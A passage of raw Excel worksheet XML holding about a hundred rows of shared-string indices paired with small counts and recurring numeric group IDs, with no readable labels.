        <v>18</v>
      </c>
      <c r="D19337">
        <v>2853</v>
      </c>
    </row>
    <row r="19338" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19338" t="s">
        <v>16229</v>
      </c>
      <c r="B19338" t="s">
        <v>16219</v>
      </c>
      <c r="C19338">
        <v>0</v>
      </c>
      <c r="D19338">
        <v>2853</v>
      </c>
    </row>
    <row r="19339" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19339" t="s">
        <v>16230</v>
      </c>
      <c r="B19339" t="s">
        <v>16220</v>
      </c>
      <c r="C19339">
        <v>6</v>
      </c>
      <c r="D19339">
        <v>2853</v>
      </c>
    </row>
    <row r="19340" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19340" t="s">
        <v>16229</v>
      </c>
      <c r="B19340" t="s">
        <v>16221</v>
      </c>
      <c r="C19340">
        <v>36</v>
      </c>
      <c r="D19340">
        <v>2853</v>
      </c>
    </row>
    <row r="19341" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19341" t="s">
        <v>16230</v>
      </c>
      <c r="B19341" t="s">
        <v>16222</v>
      </c>
      <c r="C19341">
        <v>2</v>
      </c>
      <c r="D19341">
        <v>2853</v>
      </c>
    </row>
    <row r="19342" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19342" t="s">
        <v>16223</v>
      </c>
      <c r="B19342" t="s">
        <v>16223</v>
      </c>
      <c r="C19342">
        <v>25</v>
      </c>
      <c r="D19342">
        <v>2853</v>
      </c>
    </row>
    <row r="19343" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19343" t="s">
        <v>16224</v>
      </c>
      <c r="B19343" t="s">
        <v>16224</v>
      </c>
      <c r="C19343">
        <v>1</v>
      </c>
      <c r="D19343">
        <v>2853</v>
      </c>
    </row>
    <row r="19344" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19344" t="s">
        <v>16228</v>
      </c>
      <c r="B19344" t="s">
        <v>16211</v>
      </c>
      <c r="C19344">
        <v>0</v>
      </c>
      <c r="D19344">
        <v>5446</v>
      </c>
    </row>
    <row r="19345" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19345" t="s">
        <v>16231</v>
      </c>
      <c r="B19345" t="s">
        <v>16212</v>
      </c>
      <c r="C19345">
        <v>0</v>
      </c>
      <c r="D19345">
        <v>5446</v>
      </c>
    </row>
    <row r="19346" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19346" t="s">
        <v>16228</v>
      </c>
      <c r="B19346" t="s">
        <v>16213</v>
      </c>
      <c r="C19346">
        <v>0</v>
      </c>
      <c r="D19346">
        <v>5446</v>
      </c>
    </row>
    <row r="19347" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19347" t="s">
        <v>16231</v>
      </c>
      <c r="B19347" t="s">
        <v>16214</v>
      </c>
      <c r="C19347">
        <v>1</v>
      </c>
      <c r="D19347">
        <v>5446</v>
      </c>
    </row>
    <row r="19348" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19348" t="s">
        <v>16228</v>
      </c>
      <c r="B19348" t="s">
        <v>16215</v>
      </c>
      <c r="C19348">
        <v>1</v>
      </c>
      <c r="D19348">
        <v>5446</v>
      </c>
    </row>
    <row r="19349" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19349" t="s">
        <v>16231</v>
      </c>
      <c r="B19349" t="s">
        <v>16216</v>
      </c>
      <c r="C19349">
        <v>2</v>
      </c>
      <c r="D19349">
        <v>5446</v>
      </c>
    </row>
    <row r="19350" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19350" t="s">
        <v>16228</v>
      </c>
      <c r="B19350" t="s">
        <v>16217</v>
      </c>
      <c r="C19350">
        <v>1</v>
      </c>
      <c r="D19350">
        <v>5446</v>
      </c>
    </row>
    <row r="19351" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19351" t="s">
        <v>16231</v>
      </c>
      <c r="B19351" t="s">
        <v>16218</v>
      </c>
      <c r="C19351">
        <v>2</v>
      </c>
      <c r="D19351">
        <v>5446</v>
      </c>
    </row>
    <row r="19352" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19352" t="s">
        <v>16229</v>
      </c>
      <c r="B19352" t="s">
        <v>16219</v>
      </c>
      <c r="C19352">
        <v>0</v>
      </c>
      <c r="D19352">
        <v>5446</v>
      </c>
    </row>
    <row r="19353" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19353" t="s">
        <v>16230</v>
      </c>
      <c r="B19353" t="s">
        <v>16220</v>
      </c>
      <c r="C19353">
        <v>0</v>
      </c>
      <c r="D19353">
        <v>5446</v>
      </c>
    </row>
    <row r="19354" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19354" t="s">
        <v>16229</v>
      </c>
      <c r="B19354" t="s">
        <v>16221</v>
      </c>
      <c r="C19354">
        <v>0</v>
      </c>
      <c r="D19354">
        <v>5446</v>
      </c>
    </row>
    <row r="19355" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19355" t="s">
        <v>16230</v>
      </c>
      <c r="B19355" t="s">
        <v>16222</v>
      </c>
      <c r="C19355">
        <v>1</v>
      </c>
      <c r="D19355">
        <v>5446</v>
      </c>
    </row>
    <row r="19356" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19356" t="s">
        <v>16223</v>
      </c>
      <c r="B19356" t="s">
        <v>16223</v>
      </c>
      <c r="C19356">
        <v>15</v>
      </c>
      <c r="D19356">
        <v>5446</v>
      </c>
    </row>
    <row r="19357" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19357" t="s">
        <v>16224</v>
      </c>
      <c r="B19357" t="s">
        <v>16224</v>
      </c>
      <c r="C19357">
        <v>15</v>
      </c>
      <c r="D19357">
        <v>5446</v>
      </c>
    </row>
    <row r="19358" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19358" t="s">
        <v>16228</v>
      </c>
      <c r="B19358" t="s">
        <v>16211</v>
      </c>
      <c r="C19358">
        <v>0</v>
      </c>
      <c r="D19358">
        <v>1850</v>
      </c>
    </row>
    <row r="19359" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19359" t="s">
        <v>16231</v>
      </c>
      <c r="B19359" t="s">
        <v>16212</v>
      </c>
      <c r="C19359">
        <v>0</v>
      </c>
      <c r="D19359">
        <v>1850</v>
      </c>
    </row>
    <row r="19360" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19360" t="s">
        <v>16228</v>
      </c>
      <c r="B19360" t="s">
        <v>16213</v>
      </c>
      <c r="C19360">
        <v>0</v>
      </c>
      <c r="D19360">
        <v>1850</v>
      </c>
    </row>
    <row r="19361" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19361" t="s">
        <v>16231</v>
      </c>
      <c r="B19361" t="s">
        <v>16214</v>
      </c>
      <c r="C19361">
        <v>0</v>
      </c>
      <c r="D19361">
        <v>1850</v>
      </c>
    </row>
    <row r="19362" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19362" t="s">
        <v>16228</v>
      </c>
      <c r="B19362" t="s">
        <v>16215</v>
      </c>
      <c r="C19362">
        <v>1</v>
      </c>
      <c r="D19362">
        <v>1850</v>
      </c>
    </row>
    <row r="19363" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19363" t="s">
        <v>16231</v>
      </c>
      <c r="B19363" t="s">
        <v>16216</v>
      </c>
      <c r="C19363">
        <v>0</v>
      </c>
      <c r="D19363">
        <v>1850</v>
      </c>
    </row>
    <row r="19364" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19364" t="s">
        <v>16228</v>
      </c>
      <c r="B19364" t="s">
        <v>16217</v>
      </c>
      <c r="C19364">
        <v>1</v>
      </c>
      <c r="D19364">
        <v>1850</v>
      </c>
    </row>
    <row r="19365" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19365" t="s">
        <v>16231</v>
      </c>
      <c r="B19365" t="s">
        <v>16218</v>
      </c>
      <c r="C19365">
        <v>1</v>
      </c>
      <c r="D19365">
        <v>1850</v>
      </c>
    </row>
    <row r="19366" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19366" t="s">
        <v>16229</v>
      </c>
      <c r="B19366" t="s">
        <v>16219</v>
      </c>
      <c r="C19366">
        <v>0</v>
      </c>
      <c r="D19366">
        <v>1850</v>
      </c>
    </row>
    <row r="19367" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19367" t="s">
        <v>16230</v>
      </c>
      <c r="B19367" t="s">
        <v>16220</v>
      </c>
      <c r="C19367">
        <v>3</v>
      </c>
      <c r="D19367">
        <v>1850</v>
      </c>
    </row>
    <row r="19368" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19368" t="s">
        <v>16229</v>
      </c>
      <c r="B19368" t="s">
        <v>16221</v>
      </c>
      <c r="C19368">
        <v>37</v>
      </c>
      <c r="D19368">
        <v>1850</v>
      </c>
    </row>
    <row r="19369" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19369" t="s">
        <v>16230</v>
      </c>
      <c r="B19369" t="s">
        <v>16222</v>
      </c>
      <c r="C19369">
        <v>118</v>
      </c>
      <c r="D19369">
        <v>1850</v>
      </c>
    </row>
    <row r="19370" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19370" t="s">
        <v>16223</v>
      </c>
      <c r="B19370" t="s">
        <v>16223</v>
      </c>
      <c r="C19370">
        <v>25</v>
      </c>
      <c r="D19370">
        <v>1850</v>
      </c>
    </row>
    <row r="19371" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19371" t="s">
        <v>16224</v>
      </c>
      <c r="B19371" t="s">
        <v>16224</v>
      </c>
      <c r="C19371">
        <v>0</v>
      </c>
      <c r="D19371">
        <v>1850</v>
      </c>
    </row>
    <row r="19372" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19372" t="s">
        <v>16228</v>
      </c>
      <c r="B19372" t="s">
        <v>16211</v>
      </c>
      <c r="C19372">
        <v>0</v>
      </c>
      <c r="D19372">
        <v>1291</v>
      </c>
    </row>
    <row r="19373" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19373" t="s">
        <v>16231</v>
      </c>
      <c r="B19373" t="s">
        <v>16212</v>
      </c>
      <c r="C19373">
        <v>0</v>
      </c>
      <c r="D19373">
        <v>1291</v>
      </c>
    </row>
    <row r="19374" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19374" t="s">
        <v>16228</v>
      </c>
      <c r="B19374" t="s">
        <v>16213</v>
      </c>
      <c r="C19374">
        <v>0</v>
      </c>
      <c r="D19374">
        <v>1291</v>
      </c>
    </row>
    <row r="19375" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19375" t="s">
        <v>16231</v>
      </c>
      <c r="B19375" t="s">
        <v>16214</v>
      </c>
      <c r="C19375">
        <v>0</v>
      </c>
      <c r="D19375">
        <v>1291</v>
      </c>
    </row>
    <row r="19376" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19376" t="s">
        <v>16228</v>
      </c>
      <c r="B19376" t="s">
        <v>16215</v>
      </c>
      <c r="C19376">
        <v>0</v>
      </c>
      <c r="D19376">
        <v>1291</v>
      </c>
    </row>
    <row r="19377" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19377" t="s">
        <v>16231</v>
      </c>
      <c r="B19377" t="s">
        <v>16216</v>
      </c>
      <c r="C19377">
        <v>3</v>
      </c>
      <c r="D19377">
        <v>1291</v>
      </c>
    </row>
    <row r="19378" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19378" t="s">
        <v>16228</v>
      </c>
      <c r="B19378" t="s">
        <v>16217</v>
      </c>
      <c r="C19378">
        <v>13</v>
      </c>
      <c r="D19378">
        <v>1291</v>
      </c>
    </row>
    <row r="19379" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19379" t="s">
        <v>16231</v>
      </c>
      <c r="B19379" t="s">
        <v>16218</v>
      </c>
      <c r="C19379">
        <v>1</v>
      </c>
      <c r="D19379">
        <v>1291</v>
      </c>
    </row>
    <row r="19380" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19380" t="s">
        <v>16229</v>
      </c>
      <c r="B19380" t="s">
        <v>16219</v>
      </c>
      <c r="C19380">
        <v>0</v>
      </c>
      <c r="D19380">
        <v>1291</v>
      </c>
    </row>
    <row r="19381" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19381" t="s">
        <v>16230</v>
      </c>
      <c r="B19381" t="s">
        <v>16220</v>
      </c>
      <c r="C19381">
        <v>0</v>
      </c>
      <c r="D19381">
        <v>1291</v>
      </c>
    </row>
    <row r="19382" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19382" t="s">
        <v>16229</v>
      </c>
      <c r="B19382" t="s">
        <v>16221</v>
      </c>
      <c r="C19382">
        <v>12</v>
      </c>
      <c r="D19382">
        <v>1291</v>
      </c>
    </row>
    <row r="19383" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19383" t="s">
        <v>16230</v>
      </c>
      <c r="B19383" t="s">
        <v>16222</v>
      </c>
      <c r="C19383">
        <v>6</v>
      </c>
      <c r="D19383">
        <v>1291</v>
      </c>
    </row>
    <row r="19384" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19384" t="s">
        <v>16223</v>
      </c>
      <c r="B19384" t="s">
        <v>16223</v>
      </c>
      <c r="C19384">
        <v>24</v>
      </c>
      <c r="D19384">
        <v>1291</v>
      </c>
    </row>
    <row r="19385" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19385" t="s">
        <v>16224</v>
      </c>
      <c r="B19385" t="s">
        <v>16224</v>
      </c>
      <c r="C19385">
        <v>0</v>
      </c>
      <c r="D19385">
        <v>1291</v>
      </c>
    </row>
    <row r="19386" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19386" t="s">
        <v>16228</v>
      </c>
      <c r="B19386" t="s">
        <v>16211</v>
      </c>
      <c r="C19386">
        <v>4</v>
      </c>
      <c r="D19386">
        <v>1529</v>
      </c>
    </row>
    <row r="19387" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19387" t="s">
        <v>16231</v>
      </c>
      <c r="B19387" t="s">
        <v>16212</v>
      </c>
      <c r="C19387">
        <v>0</v>
      </c>
      <c r="D19387">
        <v>1529</v>
      </c>
    </row>
    <row r="19388" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19388" t="s">
        <v>16228</v>
      </c>
      <c r="B19388" t="s">
        <v>16213</v>
      </c>
      <c r="C19388">
        <v>0</v>
      </c>
      <c r="D19388">
        <v>1529</v>
      </c>
    </row>
    <row r="19389" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19389" t="s">
        <v>16231</v>
      </c>
      <c r="B19389" t="s">
        <v>16214</v>
      </c>
      <c r="C19389">
        <v>0</v>
      </c>
      <c r="D19389">
        <v>1529</v>
      </c>
    </row>
    <row r="19390" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19390" t="s">
        <v>16228</v>
      </c>
      <c r="B19390" t="s">
        <v>16215</v>
      </c>
      <c r="C19390">
        <v>0</v>
      </c>
      <c r="D19390">
        <v>1529</v>
      </c>
    </row>
    <row r="19391" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19391" t="s">
        <v>16231</v>
      </c>
      <c r="B19391" t="s">
        <v>16216</v>
      </c>
      <c r="C19391">
        <v>1</v>
      </c>
      <c r="D19391">
        <v>1529</v>
      </c>
    </row>
    <row r="19392" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19392" t="s">
        <v>16228</v>
      </c>
      <c r="B19392" t="s">
        <v>16217</v>
      </c>
      <c r="C19392">
        <v>1</v>
      </c>
      <c r="D19392">
        <v>1529</v>
      </c>
    </row>
    <row r="19393" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19393" t="s">
        <v>16231</v>
      </c>
      <c r="B19393" t="s">
        <v>16218</v>
      </c>
      <c r="C19393">
        <v>0</v>
      </c>
      <c r="D19393">
        <v>1529</v>
      </c>
    </row>
    <row r="19394" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19394" t="s">
        <v>16229</v>
      </c>
      <c r="B19394" t="s">
        <v>16219</v>
      </c>
      <c r="C19394">
        <v>0</v>
      </c>
      <c r="D19394">
        <v>1529</v>
      </c>
    </row>
    <row r="19395" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19395" t="s">
        <v>16230</v>
      </c>
      <c r="B19395" t="s">
        <v>16220</v>
      </c>
      <c r="C19395">
        <v>0</v>
      </c>
      <c r="D19395">
        <v>1529</v>
      </c>
    </row>
    <row r="19396" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19396" t="s">
        <v>16229</v>
      </c>
      <c r="B19396" t="s">
        <v>16221</v>
      </c>
      <c r="C19396">
        <v>0</v>
      </c>
      <c r="D19396">
        <v>1529</v>
      </c>
    </row>
    <row r="19397" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19397" t="s">
        <v>16230</v>
      </c>
      <c r="B19397" t="s">
        <v>16222</v>
      </c>
      <c r="C19397">
        <v>0</v>
      </c>
      <c r="D19397">
        <v>1529</v>
      </c>
    </row>
    <row r="19398" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19398" t="s">
        <v>16223</v>
      </c>
      <c r="B19398" t="s">
        <v>16223</v>
      </c>
      <c r="C19398">
        <v>30</v>
      </c>
      <c r="D19398">
        <v>1529</v>
      </c>
    </row>
    <row r="19399" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19399" t="s">
        <v>16224</v>
      </c>
      <c r="B19399" t="s">
        <v>16224</v>
      </c>
      <c r="C19399">
        <v>2</v>
      </c>
      <c r="D19399">
        <v>1529</v>
      </c>
    </row>
    <row r="19400" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19400" t="s">
        <v>16228</v>
      </c>
      <c r="B19400" t="s">
        <v>16211</v>
      </c>
      <c r="C19400">
        <v>2</v>
      </c>
      <c r="D19400">
        <v>145</v>
      </c>
    </row>
    <row r="19401" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19401" t="s">
        <v>16231</v>
      </c>
      <c r="B19401" t="s">
        <v>16212</v>
      </c>
      <c r="C19401">
        <v>0</v>
      </c>
      <c r="D19401">
        <v>145</v>
      </c>
    </row>
    <row r="19402" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19402" t="s">
        <v>16228</v>
      </c>
      <c r="B19402" t="s">
        <v>16213</v>
      </c>
      <c r="C19402">
        <v>0</v>
      </c>
      <c r="D19402">
        <v>145</v>
      </c>
    </row>
    <row r="19403" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19403" t="s">
        <v>16231</v>
      </c>
      <c r="B19403" t="s">
        <v>16214</v>
      </c>
      <c r="C19403">
        <v>1</v>
      </c>
      <c r="D19403">
        <v>145</v>
      </c>
    </row>
    <row r="19404" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19404" t="s">
        <v>16228</v>
      </c>
      <c r="B19404" t="s">
        <v>16215</v>
      </c>
      <c r="C19404">
        <v>0</v>
      </c>
      <c r="D19404">
        <v>145</v>
      </c>
    </row>
    <row r="19405" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19405" t="s">
        <v>16231</v>
      </c>
      <c r="B19405" t="s">
        <v>16216</v>
      </c>
      <c r="C19405">
        <v>1</v>
      </c>
      <c r="D19405">
        <v>145</v>
      </c>
    </row>
    <row r="19406" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19406" t="s">
        <v>16228</v>
      </c>
      <c r="B19406" t="s">
        <v>16217</v>
      </c>
      <c r="C19406">
        <v>0</v>
      </c>
      <c r="D19406">
        <v>145</v>
      </c>
    </row>
    <row r="19407" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19407" t="s">
        <v>16231</v>
      </c>
      <c r="B19407" t="s">
        <v>16218</v>
      </c>
      <c r="C19407">
        <v>0</v>
      </c>
      <c r="D19407">
        <v>145</v>
      </c>
    </row>
    <row r="19408" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19408" t="s">
        <v>16229</v>
      </c>
      <c r="B19408" t="s">
        <v>16219</v>
      </c>
      <c r="C19408">
        <v>1</v>
      </c>
      <c r="D19408">
        <v>145</v>
      </c>
    </row>
    <row r="19409" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19409" t="s">
        <v>16230</v>
      </c>
      <c r="B19409" t="s">
        <v>16220</v>
      </c>
      <c r="C19409">
        <v>0</v>
      </c>
      <c r="D19409">
        <v>145</v>
      </c>
    </row>
    <row r="19410" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19410" t="s">
        <v>16229</v>
      </c>
      <c r="B19410" t="s">
        <v>16221</v>
      </c>
      <c r="C19410">
        <v>1</v>
      </c>
      <c r="D19410">
        <v>145</v>
      </c>
    </row>
    <row r="19411" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19411" t="s">
        <v>16230</v>
      </c>
      <c r="B19411" t="s">
        <v>16222</v>
      </c>
      <c r="C19411">
        <v>0</v>
      </c>
      <c r="D19411">
        <v>145</v>
      </c>
    </row>
    <row r="19412" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19412" t="s">
        <v>16223</v>
      </c>
      <c r="B19412" t="s">
        <v>16223</v>
      </c>
      <c r="C19412">
        <v>5</v>
      </c>
      <c r="D19412">
        <v>145</v>
      </c>
    </row>
    <row r="19413" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19413" t="s">
        <v>16224</v>
      </c>
      <c r="B19413" t="s">
        <v>16224</v>
      </c>
      <c r="C19413">
        <v>1</v>
      </c>
      <c r="D19413">
        <v>145</v>
      </c>
    </row>
    <row r="19414" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19414" t="s">
        <v>16228</v>
      </c>
      <c r="B19414" t="s">
        <v>16211</v>
      </c>
      <c r="C19414">
        <v>0</v>
      </c>
      <c r="D19414">
        <v>1917</v>
      </c>
    </row>
    <row r="19415" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19415" t="s">
        <v>16231</v>
      </c>
      <c r="B19415" t="s">
        <v>16212</v>
      </c>
      <c r="C19415">
        <v>0</v>
      </c>
      <c r="D19415">
        <v>1917</v>
      </c>
    </row>
    <row r="19416" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19416" t="s">
        <v>16228</v>
      </c>
      <c r="B19416" t="s">
        <v>16213</v>
      </c>
      <c r="C19416">
        <v>0</v>
      </c>
      <c r="D19416">
        <v>1917</v>
      </c>
    </row>
    <row r="19417" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19417" t="s">
        <v>16231</v>
      </c>
      <c r="B19417" t="s">
        <v>16214</v>
      </c>
      <c r="C19417">
        <v>0</v>
      </c>
      <c r="D19417">
        <v>1917</v>
      </c>
    </row>
    <row r="19418" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19418" t="s">
        <v>16228</v>
      </c>
      <c r="B19418" t="s">
        <v>16215</v>
      </c>
      <c r="C19418">
        <v>5</v>
      </c>
      <c r="D19418">
        <v>1917</v>
      </c>
    </row>
    <row r="19419" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19419" t="s">
        <v>16231</v>
      </c>
      <c r="B19419" t="s">
        <v>16216</v>
      </c>
      <c r="C19419">
        <v>2</v>
      </c>
      <c r="D19419">
        <v>1917</v>
      </c>
    </row>
    <row r="19420" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19420" t="s">
        <v>16228</v>
      </c>
      <c r="B19420" t="s">
        <v>16217</v>
      </c>
      <c r="C19420">
        <v>1</v>
      </c>
      <c r="D19420">
        <v>1917</v>
      </c>
    </row>
    <row r="19421" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19421" t="s">
        <v>16231</v>
      </c>
      <c r="B19421" t="s">
        <v>16218</v>
      </c>
      <c r="C19421">
        <v>1</v>
      </c>
      <c r="D19421">
        <v>1917</v>
      </c>
    </row>
    <row r="19422" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19422" t="s">
        <v>16229</v>
      </c>
      <c r="B19422" t="s">
        <v>16219</v>
      </c>
      <c r="C19422">
        <v>1</v>
      </c>
      <c r="D19422">
        <v>1917</v>
      </c>
    </row>
    <row r="19423" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19423" t="s">
        <v>16230</v>
      </c>
      <c r="B19423" t="s">
        <v>16220</v>
      </c>
      <c r="C19423">
        <v>1</v>
      </c>
      <c r="D19423">
        <v>1917</v>
      </c>
    </row>
    <row r="19424" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19424" t="s">
        <v>16229</v>
      </c>
      <c r="B19424" t="s">
        <v>16221</v>
      </c>
      <c r="C19424">
        <v>30</v>
      </c>
      <c r="D19424">
        <v>1917</v>
      </c>
    </row>
    <row r="19425" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19425" t="s">
        <v>16230</v>
      </c>
      <c r="B19425" t="s">
        <v>16222</v>
      </c>
      <c r="C19425">
        <v>15</v>
      </c>
      <c r="D19425">
        <v>1917</v>
      </c>
    </row>
    <row r="19426" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19426" t="s">
        <v>16223</v>
      </c>
      <c r="B19426" t="s">
        <v>16223</v>
      </c>
      <c r="C19426">
        <v>25</v>
      </c>
      <c r="D19426">
        <v>1917</v>
      </c>
    </row>
    <row r="19427" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19427" t="s">
        <v>16224</v>
      </c>
      <c r="B19427" t="s">
        <v>16224</v>
      </c>
      <c r="C19427">
        <v>1</v>
      </c>
      <c r="D19427">
        <v>1917</v>
      </c>
    </row>
    <row r="19428" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19428" t="s">
        <v>16231</v>
      </c>
      <c r="B19428" t="s">
        <v>16214</v>
      </c>
      <c r="C19428">
        <v>0</v>
      </c>
      <c r="D19428">
        <v>5446</v>
      </c>
    </row>
    <row r="19429" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19429" t="s">
        <v>16228</v>
      </c>
      <c r="B19429" t="s">
        <v>16211</v>
      </c>
      <c r="C19429">
        <v>0</v>
      </c>
      <c r="D19429">
        <v>1768</v>
      </c>
    </row>
    <row r="19430" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19430" t="s">
        <v>16231</v>
      </c>
      <c r="B19430" t="s">
        <v>16212</v>
      </c>
      <c r="C19430">
        <v>0</v>
      </c>
      <c r="D19430">
        <v>1768</v>
      </c>
    </row>
    <row r="19431" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19431" t="s">
        <v>16228</v>
      </c>
      <c r="B19431" t="s">
        <v>16213</v>
      </c>
      <c r="C19431">
        <v>0</v>
      </c>
      <c r="D19431">
        <v>1768</v>
      </c>
    </row>
    <row r="19432" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19432" t="s">
        <v>16231</v>
      </c>
      <c r="B19432" t="s">
        <v>16214</v>
      </c>
      <c r="C19432">
        <v>0</v>
      </c>
      <c r="D19432">
        <v>1768</v>
      </c>
    </row>
    <row r="19433" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19433" t="s">
        <v>16228</v>
      </c>
      <c r="B19433" t="s">
        <v>16215</v>
      </c>
      <c r="C19433">
        <v>1</v>
      </c>
      <c r="D19433">
        <v>1768</v>
      </c>
    </row>
    <row r="19434" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19434" t="s">
        <v>16231</v>
      </c>
      <c r="B19434" t="s">
        <v>16216</v>
      </c>
      <c r="C19434">
        <v>4</v>
      </c>
      <c r="D19434">
        <v>1768</v>
      </c>
    </row>
    <row r="19435" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19435" t="s">
        <v>16228</v>
      </c>
      <c r="B19435" t="s">
        <v>16217</v>
      </c>
      <c r="C19435">
        <v>8</v>
      </c>
      <c r="D19435">
        <v>1768</v>
      </c>
    </row>
    <row r="19436" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19436" t="s">
        <v>16231</v>
      </c>
      <c r="B19436" t="s">
        <v>16218</v>
      </c>
      <c r="C19436">
        <v>3</v>
      </c>
      <c r="D19436">
        <v>1768</v>
      </c>
    </row>
    <row r="19437" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19437" t="s">
        <v>16229</v>
      </c>
      <c r="B19437" t="s">
        <v>16219</v>
      </c>
      <c r="C19437">
        <v>0</v>
      </c>
      <c r="D19437">
        <v>1768</v>
      </c>
    </row>
    <row r="19438" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19438" t="s">
        <v>16230</v>
      </c>
      <c r="B19438" t="s">
        <v>16220</v>
      </c>
      <c r="C19438">
        <v>0</v>
      </c>
      <c r="D19438">
        <v>1768</v>
      </c>
    </row>
    <row r="19439" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19439" t="s">
        <v>16229</v>
      </c>
      <c r="B19439" t="s">
        <v>16221</v>
      </c>
      <c r="C19439">
        <v>4</v>
      </c>
      <c r="D19439">
        <v>1768</v>
      </c>
    </row>
    <row r="19440" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19440" t="s">
        <v>16230</v>
      </c>
      <c r="B19440" t="s">
        <v>16222</v>
      </c>
      <c r="C19440">
        <v>5</v>
      </c>
      <c r="D19440">
        <v>1768</v>
      </c>
    </row>
    <row r="19441" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19441" t="s">
        <v>16223</v>
      </c>
      <c r="B19441" t="s">
        <v>16223</v>
      </c>
      <c r="C19441">
        <v>0</v>
      </c>
      <c r="D19441">
        <v>1768</v>
      </c>
    </row>
    <row r="19442" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A19442" t="s">
        <v>16224</v>
      </c>
      <c r="B19442" t="s">
        <v>16224</v>
      </c>
